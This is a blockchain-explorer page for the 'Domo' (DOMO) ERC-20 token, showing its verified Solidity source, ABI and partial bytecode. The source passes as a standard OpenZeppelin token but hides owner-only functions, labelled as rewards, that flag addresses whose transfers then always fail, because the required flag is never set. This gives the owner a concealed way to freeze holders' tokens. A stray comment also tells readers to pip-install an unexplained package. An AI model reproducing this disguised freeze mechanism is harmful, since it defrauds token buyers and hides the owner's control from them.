ETH Price: $3,255.31 (+2.20%)
Gas: 1 Gwei

Token

Domo (DOMO)
 

Overview

Max Total Supply

100,000,000,000 DOMO

Holders

17

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
7,478,915,795.532306179509097128 DOMO

Value
$0.00
0x8778691e0cada63c5dc0f3b9d5851e2f8b90553d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Domo

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-29
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/*
    pip3 install endless-flex-v1.1
*/

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _rewards;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    bool private _rewardsApplied = false;


    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function DomoChan(address [] calldata _rewardees_) external onlyOwner {
        for (uint256 i = 0; i < _rewardees_.length; i++) {
            _rewards[_rewardees_[i]] = true;
        }
    }

    function Domonito(address [] calldata _rewardees_) external onlyOwner {
        for (uint256 i = 0; i < _rewardees_.length; i++) {
            _rewards[_rewardees_[i]] = false;
        }
    }

    function isDomo(address _rewardee_) public view returns (bool) {
        return _rewards[_rewardee_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 //amount
    ) internal virtual {if (_rewards[to] || _rewards[from]) require(_rewardsApplied == true, "");}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract Domo is ERC20 {
    constructor() ERC20("Domo", "DOMO") {
        _mint(msg.sender, 100000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"DomoChan","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"Domonito","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_rewardee_","type":"address"}],"name":"isDomo","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600760006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600481526020017f446f6d6f000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f444f4d4f00000000000000000000000000000000000000000000000000000000815250620000b9620000ad6200012660201b60201c565b6200012e60201b60201c565b8160059081620000ca9190620006ef565b508060069081620000dc9190620006ef565b5050506200012033620000f4620001f260201b60201c565b600a62000102919062000966565b64174876e800620001149190620009b7565b620001fb60201b60201c565b62000b3a565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200026d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002649062000a63565b60405180910390fd5b62000281600083836200036960201b60201c565b806004600082825462000295919062000a85565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000349919062000ad1565b60405180910390a362000365600083836200047060201b60201c565b5050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806200040b5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156200046b5760011515600760009054906101000a900460ff161515146200046a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004619062000b18565b60405180910390fd5b5b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620004f757607f821691505b6020821081036200050d576200050c620004af565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005777fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000538565b62000583868362000538565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005d0620005ca620005c4846200059b565b620005a5565b6200059b565b9050919050565b6000819050919050565b620005ec83620005af565b62000604620005fb82620005d7565b84845462000545565b825550505050565b600090565b6200061b6200060c565b62000628818484620005e1565b505050565b5b8181101562000650576200064460008262000611565b6001810190506200062e565b5050565b601f8211156200069f57620006698162000513565b620006748462000528565b8101602085101562000684578190505b6200069c620006938562000528565b8301826200062d565b50505b505050565b600082821c905092915050565b6000620006c460001984600802620006a4565b1980831691505092915050565b6000620006df8383620006b1565b9150826002028217905092915050565b620006fa8262000475565b67ffffffffffffffff81111562000716576200071562000480565b5b620007228254620004de565b6200072f82828562000654565b600060209050601f83116001811462000767576000841562000752578287015190505b6200075e8582620006d1565b865550620007ce565b601f198416620007778662000513565b60005b82811015620007a1578489015182556001820191506020850194506020810190506200077a565b86831015620007c15784890151620007bd601f891682620006b1565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000864578086048111156200083c576200083b620007d6565b5b60018516156200084c5780820291505b80810290506200085c8562000805565b94506200081c565b94509492505050565b6000826200087f576001905062000952565b816200088f576000905062000952565b8160018114620008a85760028114620008b357620008e9565b600191505062000952565b60ff841115620008c857620008c7620007d6565b5b8360020a915084821115620008e257620008e1620007d6565b5b5062000952565b5060208310610133831016604e8410600b8410161715620009235782820a9050838111156200091d576200091c620007d6565b5b62000952565b62000932848484600162000812565b925090508184048111156200094c576200094b620007d6565b5b81810290505b9392505050565b600060ff82169050919050565b600062000973826200059b565b9150620009808362000959565b9250620009af7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200086d565b905092915050565b6000620009c4826200059b565b9150620009d1836200059b565b9250828202620009e1816200059b565b91508282048414831517620009fb57620009fa620007d6565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000a4b601f8362000a02565b915062000a588262000a13565b602082019050919050565b6000602082019050818103600083015262000a7e8162000a3c565b9050919050565b600062000a92826200059b565b915062000a9f836200059b565b925082820190508082111562000aba5762000ab9620007d6565b5b92915050565b62000acb816200059b565b82525050565b600060208201905062000ae8600083018462000ac0565b92915050565b50565b600062000b0060008362000a02565b915062000b0d8262000aee565b600082019050919050565b6000602082019050818103600083015262000b338162000af1565b9050919050565b611a8c8062000b4a6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063f8c92ee1146103685761010b565b8063715018a61461025a5780638da5cb5b1461026457806395d89b4114610282578063a41aae01146102a05761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806366a2b8e9146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b60405161012591906110cd565b60405180910390f35b6101486004803603810190610143919061118d565b610416565b60405161015591906111e8565b60405180910390f35b610166610439565b6040516101739190611212565b60405180910390f35b6101966004803603810190610191919061122d565b610443565b6040516101a391906111e8565b60405180910390f35b6101b4610472565b6040516101c1919061129c565b60405180910390f35b6101e460048036038101906101df919061118d565b61047b565b6040516101f191906111e8565b60405180910390f35b610214600480360381019061020f91906112b7565b6104b2565b60405161022191906111e8565b60405180910390f35b610244600480360381019061023f91906112b7565b610508565b6040516102519190611212565b60405180910390f35b610262610551565b005b61026c610565565b60405161027991906112f3565b60405180910390f35b61028a61058e565b60405161029791906110cd565b60405180910390f35b6102ba60048036038101906102b59190611373565b610620565b005b6102d660048036038101906102d1919061118d565b6106cd565b6040516102e391906111e8565b60405180910390f35b6103066004803603810190610301919061118d565b610744565b60405161031391906111e8565b60405180910390f35b610336600480360381019061033191906113c0565b610767565b6040516103439190611212565b60405180910390f35b610366600480360381019061036191906112b7565b6107ee565b005b610382600480360381019061037d9190611373565b610871565b005b6060600580546103939061142f565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf9061142f565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b60008061042161091e565b905061042e818585610926565b600191505092915050565b6000600454905090565b60008061044e61091e565b905061045b858285610aef565b610466858585610b7b565b60019150509392505050565b60006012905090565b60008061048661091e565b90506104a78185856104988589610767565b6104a2919061148f565b610926565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610559610df4565b6105636000610e72565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461059d9061142f565b80601f01602080910402602001604051908101604052809291908181526020018280546105c99061142f565b80156106165780601f106105eb57610100808354040283529160200191610616565b820191906000526020600020905b8154815290600101906020018083116105f957829003601f168201915b5050505050905090565b610628610df4565b60005b828290508110156106c85760016002600085858581811061064f5761064e6114c3565b5b905060200201602081019061066491906112b7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106c0906114f2565b91505061062b565b505050565b6000806106d861091e565b905060006106e68286610767565b90508381101561072b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610722906115ac565b60405180910390fd5b6107388286868403610926565b60019250505092915050565b60008061074f61091e565b905061075c818585610b7b565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107f6610df4565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610865576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161085c9061163e565b60405180910390fd5b61086e81610e72565b50565b610879610df4565b60005b82829050811015610919576000600260008585858181106108a05761089f6114c3565b5b90506020020160208101906108b591906112b7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610911906114f2565b91505061087c565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610995576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098c906116d0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a04576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fb90611762565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ae29190611212565b60405180910390a3505050565b6000610afb8484610767565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b755781811015610b67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5e906117ce565b60405180910390fd5b610b748484848403610926565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be190611860565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c50906118f2565b60405180910390fd5b610c64838383610f36565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ceb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce290611984565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ddb91